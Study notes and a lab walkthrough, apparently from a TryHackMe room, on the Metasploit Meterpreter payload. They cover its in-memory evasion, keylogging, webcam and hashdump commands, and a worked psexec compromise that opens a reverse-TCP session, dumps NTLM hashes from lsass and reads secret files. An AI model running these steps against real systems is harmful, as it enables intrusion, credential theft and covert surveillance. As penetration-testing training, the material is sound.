# Meterpreter
## Introduction
* Meterpreter is a Metasploit payload.
* Will run on the target system and act as an agent within a command and control architecture.
* Interact with the target OS and files and use Meterpreter's specialised commands.

## How does Meterpreter work?
* Runs in memory (RAM - Random Access Memory) on the target system.
* Does not write itself to the disk on the target.
  * Aims to avoid being detected during antivirus scans.
  * Most antivirus software will scan new files on the disk (e.g. when you download a file from the internet).
  * Meterpreter will be seen as a process and not have a file on the target system.
* Aims to avoid being detected by network-based IPS (Intrusion Prevention System) and IDS (Intrusion Detection System) solutions by using encrypted communication with the server where Metasploit runs.
  * IPS and IDS solutions will not be able to detect its activities if the target organisation does not decrypt and inspect encrypted traffic (e.g. HTTPS) coming to and going out of the local network.
* Process ID (or process identifier) is used by OS to identify running processes.
  * All processes running in Linux or Windows will have a unique ID number.
  * Number is used to interact with the process when the need arises.
    * If it needs to be stopped.
```
meterpreter > getpid 
Current pid: 1304
```
* List processes running on the target system using the `ps` command.
  * PID 1304 is spoolsv.exe and not Meterpreter.exe.
* Looking at DLLs (Dynamic-Link Libraries) used by the Meterpreter process (PID 1304) would not find anything (e.g. no meterpreter.dll).
* Meterpreter will establish an encrypted (TLS) communication channel with the attacker's system.

## Meterpreter Flavours
* Metasploit payloads can be divided into two categories.
  * Inline (also called single).
    * Sent to the target in a single step.
  * Staged.
    * Sent in two steps.
    * An initial part is installed (the stager) and requests the rest of the payload.
    * This allows for a smaller initial payload size. 
* Meterpreter payloads are also divided into staged and inline versions.
* Easiest way to have an idea about available Meterpreter versions could be to list them using msfvenom.
  * Use `msfvenom --list payloads` and grep 'meterpreter' payloads (adding `| grep meterpreter` to the command line).
* Decision on which version of Meterpreter to use will be mostly based on three factors.
  * The target operating system (Is the target operating system Linux or Windows?
    * Is it a Mac device? Is it an Android phone? etc.)
  * Components available on the target system (Is Python installed?
    * Is this a PHP website? etc.)
  * Network connection types you can have with the target system (Do they allow raw TCP connections?
    * Can you only have an HTTPS reverse connection?
    * Are IPv6 addresses not as closely monitored as IPv4 addresses? etc.)
* The choice may also be limited by the exploit if not using Meterpreter as a standalone payload generated by Msfvenom.
* Some exploits will have a default Meterpreter payload. 
```
msf6 > use exploit/windows/smb/ms17_010_eternalblue 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >
```       
* Can list other available payloads using the `show payloads` command with any module. 

## Meterpreter Commands
* Typing help on any Meterpreter session (shown by meterpreter> at the prompt) will list all available commands.
* Every version of Meterpreter will have different command options, so running the help command is always a good idea. 
* Commands are built-in tools available on Meterpreter.
* They will run on the target system without loading any additional script or executable files.
* Meterpreter will provide you with three primary categories of tools;
* Built-in commands
* Meterpreter tools
* Meterpreter scripting
* If you run the help command, you will see Meterpreter commands are listed under different categories.
* Core commands
* File system commands
* Networking commands
* System commands
* User interface commands
* Webcam commands
* Audio output commands
* Elevate commands
* Password database commands
* Timestomp commands
* Please note that the list above was taken from the output of the help command on the Windows version of Meterpreter (windows/x64/meterpreter/reverse_tcp).
* These will be different for other Meterpreter versions.
* Meterpreter commands
* Core commands will be helpful to navigate and interact with the target system.
* Below are some of the most commonly used.
* Remember to check all available commands running the help command once a Meterpreter session has started.Core commands
background: Backgrounds the current session
exit: Terminate the Meterpreter session
guid: Get the session GUID (Globally Unique Identifier)
help: Displays the help menu
info: Displays information about a Post module
irb: Opens an interactive Ruby shell on the current session
load: Loads one or more Meterpreter extensions
migrate: Allows you to migrate Meterpreter to another process
run: Executes a Meterpreter script or Post module
sessions: Quickly switch to another session
File system commands
cd: Will change directory
ls: Will list files in the current directory (dir will also work)
pwd: Prints the current working directory
edit: will allow you to edit a file
cat: Will show the contents of a file to the screen
rm: Will delete the specified file
search: Will search for files
upload: Will upload a file or directory
download: Will download a file or directory
Networking commands
arp: Displays the host ARP (Address Resolution Protocol) cache
ifconfig: Displays network interfaces available on the target system
netstat: Displays the network connections
portfwd: Forwards a local port to a remote service
route: Allows you to view and modify the routing table
System commands
clearev: Clears the event logs
execute: Executes a command
getpid: Shows the current process identifier
getuid: Shows the user that Meterpreter is running as
kill: Terminates a process
pkill: Terminates processes by name
ps: Lists running processes
reboot: Reboots the remote computer
shell: Drops into a system command shell
shutdown: Shuts down the remote computer
sysinfo: Gets information about the remote system, such as OS
Other Commands
These will be listed under different menu categories in the help menu)
idletime: Returns the number of seconds the remote user has been idle
keyscan_dump: Dumps the keystroke buffer
keyscan_start: Starts capturing keystrokes
keyscan_stop: Stops capturing keystrokes
screenshare: Allows you to watch the remote user's desktop in real time
screenshot: Grabs a screenshot of the interactive desktop
record_mic: Records audio from the default microphone for X seconds
webcam_chat: Starts a video chat
webcam_list: Lists webcams
webcam_snap: Takes a snapshot from the specified webcam
webcam_stream: Plays a video stream from the specified webcam
getsystem: Attempts to elevate your privilege to that of local system
hashdump: Dumps the contents of the SAM database
Although all these commands may seem available under the help menu, they may not all work. For example, the target system might not have a webcam, or it can be running on a virtual machine without a proper desktop environment. 
Post-Exploitation with Meterpreter
Meterpreter provides you with many useful commands that facilitate the post-exploitation phase. Below are a few examples you will often use.
Help
This command will give you a list of all available commands in Meterpreter. As we have seen earlier, Meterpreter has many versions, and each version may have different options available. Typing help once you have a Meterpreter session will help you quickly browse through available commands.
Meterpreter commands
The getuid command will display the user with which Meterpreter is currently running. This will give you an idea of your possible privilege level on the target system (e.g. Are you an admin level user like NT AUTHORITY\SYSTEM or a regular user?)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
The ps command will list running processes. The PID column will also give you the PID information you will need to migrate Meterpreter to another process.

Migrate
Migrating to another process will help Meterpreter interact with it. For example, if you see a word processor running on the target (e.g. word.exe, notepad.exe, etc.), you can migrate to it and start capturing keystrokes sent by the user to this process. Some Meterpreter versions will offer you the keyscan_start, keyscan_stop, and keyscan_dump command options to make Meterpreter act like a keylogger. Migrating to another process may also help you to have a more stable Meterpreter session.
To migrate to any process, you need to type the migrate command followed by the PID of the desired target process. The example below shows Meterpreter migrating to process ID 716.
meterpreter > migrate 716
[*] Migrating from 1304 to 716...
[*] Migration completed successfully.
Be careful; you may lose your user privileges if you migrate from a higher privileged (e.g. SYSTEM) user to a process started by a lower privileged user (e.g. webserver). You may not be able to gain them back.
Hashdump
The hashdump command will list the content of the SAM database. The SAM (Security Account Manager) database stores user's passwords on Windows systems. These passwords are stored in the NTLM (New Technology LAN Manager) format.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
While it is not mathematically possible to "crack" these hashes, you may still discover the cleartext password using online NTLM databases or a rainbow table attack. These hashes can also be used in Pass-the-Hash attacks to authenticate to other systems that these users can access the same network.
Search
The search command is useful to locate files with potentially juicy information. In a CTF context, this can be used to quickly find a flag or proof file, while in actual penetration testing engagements, you may need to search for user-generated files or configuration files that may contain password or account information.
meterpreter > search -f flag2.txt
Found 1 result...
    c:\Windows\System32\config\flag2.txt (34 bytes)
Shell
The shell command will launch a regular command-line shell on the target system. Pressing CTRL+Z will help you go back to the Meterpreter shell.
meterpreter > shell
Process 2124 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
Post-Exploitation Challenge
Meterpreter provides several important post-exploitation tools.
Commands mentioned previously, such as getsystem and hashdump will provide important leverage and information for privilege escalation and lateral movement. Meterpreter is also a good base you can use to run post-exploitation modules available on the Metasploit framework. Finally, you can also use the load command to leverage additional tools such as Kiwi or even the whole Python language.
meterpreter > load python
Loading extension python...Success.
meterpreter > python_execute "print 'TryHackMe Rocks!'"
[+] Content written to stdout:
TryHackMe Rocks!
The post-exploitation phase will have several goals; Meterpreter has functions that can assist all of them.
Gathering further information about the target system.
Looking for interesting files, user credentials, additional network interfaces, and generally interesting information on the target system.
Privilege escalation.
Lateral movement.
Once any additional tool is loaded using the load command, you will see new options on the help menu. The example below shows commands added for the Kiwi module (using the load kiwi command).
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
       
These will change according to the loaded menu, so running the help command after loading a module is always a good idea.
The questions below will help you have a better understanding of how Meterpreter can be used in post-exploitation.
You can use the credentials below to simulate an initial compromise over SMB (Server Message Block) (using exploit/windows/smb/psexec)



Username: ballen / password: Password1
root@ip-10-10-159-26:~# msfconsole
msf6 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set rhosts 10.10.113.225
msf6 exploit(windows/smb/psexec) > set smbuser ballen
msf6 exploit(windows/smb/psexec) > set smbpass Password1
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.10.159.26:4444
[*] 10.10.113.225:445 - Connecting to the server...
[*] 10.10.113.225:445 - Authenticating to 10.10.113.225:445 as user 'ballen'...
[*] 10.10.113.225:445 - Selecting PowerShell target
[*] 10.10.113.225:445 - Executing the payload...
[+] 10.10.113.225:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 10.10.113.225
[*] Meterpreter session 1 opened (10.10.159.26:4444 -> 10.10.113.225:53643) at 2024-01-01 17:42:37 +0000

meterpreter >

What is the computer name?
What is the target domain?
meterpreter > sysinfo
Computer    	: ACME-TEST
OS          	: Windows 2016+ (10.0 Build 17763).
Architecture	: x64
System Language : en_US
Domain      	: FLASH
Logged On Users : 7
Meterpreter 	: x86/windows
What is the name of the share likely created by the user?
	
	CTRL+Z
	Background session 1? [y/N]
msf6 exploit(windows/smb/psexec) > use post/windows/gather/enum_shares
msf6 post(windows/gather/enum_shares) > set SESSION 1
msf6 post(windows/gather/enum_shares) > run

[*] Running module against ACME-TEST (10.10.113.225)
[*] The following shares were found:
[*]     Name: SYSVOL
[*]     Path: C:\Windows\SYSVOL\sysvol
[*]     Remark: Logon server share
[*]     Type: DISK
[*]
[*]     Name: NETLOGON
[*]     Path: C:\Windows\SYSVOL\sysvol\FLASH.local\SCRIPTS
[*]     Remark: Logon server share
[*]     Type: DISK
[*]
[*]     Name: speedster
[*]     Path: C:\Shares\speedster
[*]     Type: DISK
[*]
[*] Post module execution completed
What is the NTLM hash of the jchambers user?
```	
meterpreter > ps | grep lsass.exe
Filtering on 'lsass.exe'
Process List
============
 PID  PPID  Name   	Arch  Session  User             	Path
 ---  ----  ----   	----  -------  ----             	----
 776  648   lsass.exe  x64   0    	NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe

meterpreter > migrate 776
[*] Migrating from 564 to 776...
[*] Migration completed successfully.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9ac3de200cb4d510fed7610c7037292:::
ballen:1112:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
jfox:1115:aad3b435b51404eeaad3b435b51404ee:c64540b95e2b2f36f0291c3a9fb8b840:::
lnelson:1116:aad3b435b51404eeaad3b435b51404ee:e88186a7bb7980c913dc90c7caa2a3b9:::
erptest:1117:aad3b435b51404eeaad3b435b51404ee:8b9ca7572fe60a1559686dba90726715:::
ACME-TEST$:1008:aad3b435b51404eeaad3b435b51404ee:c6c85041ee383915bd541ce40b508ff0:::
```
What is the cleartext password of the jchambers user?
	
	Trustno1
Where is the "secrets.txt"  file located? (Full path of the file)
```
meterpreter > search -f secrets.txt
ound 1 result...
=================

Path                                                        	Size (bytes)  Modified (UTC)
----                                                        	------------  --------------
c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt  35        	2021-07-30 08:44:27 +0100
What is the Twitter password revealed in the "secrets.txt" file?
	meterpreter > cat "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"
	
My Twitter password is KDSvbsw3849!
Where is the "realsecret.txt" file located? (Full path of the file)
meterpreter > search -f realsecret.txt
Found 1 result...
=================

Path                           	Size (bytes)  Modified (UTC)
----                           	------------  --------------
c:\inetpub\wwwroot\realsecret.txt  34        	2021-07-30 09:30:24 +0100
What is the real secret?
	meterpreter > cat "c:\inetpub\wwwroot\realsecret.txt"

The Flash is the fastest man alive
```
